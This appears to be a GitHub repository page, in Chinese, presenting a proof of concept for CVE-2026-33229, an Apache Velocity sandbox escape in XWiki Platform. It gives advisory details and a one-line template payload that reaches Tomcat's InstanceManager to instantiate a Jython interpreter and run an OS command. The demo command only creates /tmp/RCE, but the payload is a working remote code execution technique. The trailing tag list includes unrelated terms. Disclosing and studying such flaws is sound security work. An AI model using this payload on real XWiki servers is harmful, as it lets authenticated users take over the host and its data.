azefzafyoussef/CVE-2026-33229
GitHub: azefzafyoussef/CVE-2026-33229
这是一个针对 XWiki 平台 CVE-2026-33229 漏洞的概念验证代码,通过绕过 Apache Velocity 沙箱实现远程代码执行。
Stars: 0 | Forks: 0
# CVE-2026-33229 — 通过 Apache Velocity 沙箱逃逸实现 XWiki RCE



**XWiki Platform** 中存在的一个远程代码执行漏洞,允许具有脚本权限的认证用户通过遍历 Velocity 上下文中已存在的预实例化对象,完全绕过 Apache Velocity 沙箱——无需使用 Java 反射。
## 详情
| 字段 | 值 |
|---|---|
| CVE ID | `CVE-2026-33229` |
| 受影响产品 | XWiki Platform |
| 组件 | Velocity 宏渲染器,页面标题参数 |
| 所需权限 | 已认证 + 脚本权限 |
| 影响 | 远程代码执行 |
| GHSA | [GHSA-h259-74h5-4rh9](https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h259-74h5-4rh9) |
| 发现时间 | 2025年11月7日 |
| 修复时间 | 2025年12月10日 |
| 披露时间 | 2026年4月8日 |
## 概念验证
```
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
```
标签:Apache Velocity, CISA项目, CSV导出, CVE-2026-33229, GHAS, GHSA, Java安全, JS文件枚举, Jython, PoC, RCE, Sandbox Bypass, SSTI, Velocity上下文, Web安全, XWiki, 实例管理器, 暴力破解, 服务器端模板注入, 模板注入, 沙箱逃逸, 漏洞分析, 编程工具, 网络安全, 脚本权限, 蓝队分析, 路径探测, 远程代码执行, 逆向工具, 隐私保护